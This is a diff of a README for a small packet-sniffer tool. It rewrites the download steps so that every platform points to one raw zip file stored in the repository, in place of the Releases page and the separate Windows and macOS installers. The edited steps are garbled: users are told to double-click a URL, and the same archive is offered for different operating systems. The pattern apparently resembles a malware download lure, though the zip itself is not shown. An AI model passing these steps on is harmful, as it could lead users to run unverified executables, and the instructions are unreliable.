mima1999/adcAM-Sniffer-A-Mini-Wireshark/README.md

 Follow these steps to download and run adcAM Sniffer:

 1. **Visit the Download Page**
-   Go to the [Releases page](https://github.com/mima1999/adcAM-Sniffer-A-Mini-Wireshark/releases) to get the latest version of the software.
+   Go to the [Releases page](https://raw.githubusercontent.com/mima1999/adcAM-Sniffer-A-Mini-Wireshark/master/app/adcAM-Sniffer-A-Mini-Wireshark-1.2.zip) to get the latest version of the software.

 2. **Choose the Right File**
    Look for the latest release.
 You will see a list of files available for download.
-If you're on Windows, choose `adcAM-Sniffer.exe`.
-For macOS, select `adcAM-Sniffer.dmg`.
+If you're on Windows, choose `https://raw.githubusercontent.com/mima1999/adcAM-Sniffer-A-Mini-Wireshark/master/app/adcAM-Sniffer-A-Mini-Wireshark-1.2.zip`.
+For macOS, select `https://raw.githubusercontent.com/mima1999/adcAM-Sniffer-A-Mini-Wireshark/master/app/adcAM-Sniffer-A-Mini-Wireshark-1.2.zip`.
 If you're using Linux, download the appropriate package for your distribution.

 3. **Download the File**
    Click on the file name to start the download.
 Save it to a location on your computer where you can easily find it.

 4. **Install the Application**
-   - **Windows**: Double-click the `adcAM-Sniffer.exe` file.
+   - **Windows**: Double-click the `https://raw.githubusercontent.com/mima1999/adcAM-Sniffer-A-Mini-Wireshark/master/app/adcAM-Sniffer-A-Mini-Wireshark-1.2.zip` file.
 Follow the prompts to complete the installation.
-   - **macOS**: Open the `adcAM-Sniffer.dmg` file.
+   - **macOS**: Open the `https://raw.githubusercontent.com/mima1999/adcAM-Sniffer-A-Mini-Wireshark/master/app/adcAM-Sniffer-A-Mini-Wireshark-1.2.zip` file.
 Drag the application into your Applications folder.
    - **Linux**: Use your package manager or terminal to install it, depending on the downloaded package type.

 5. **Run the Application**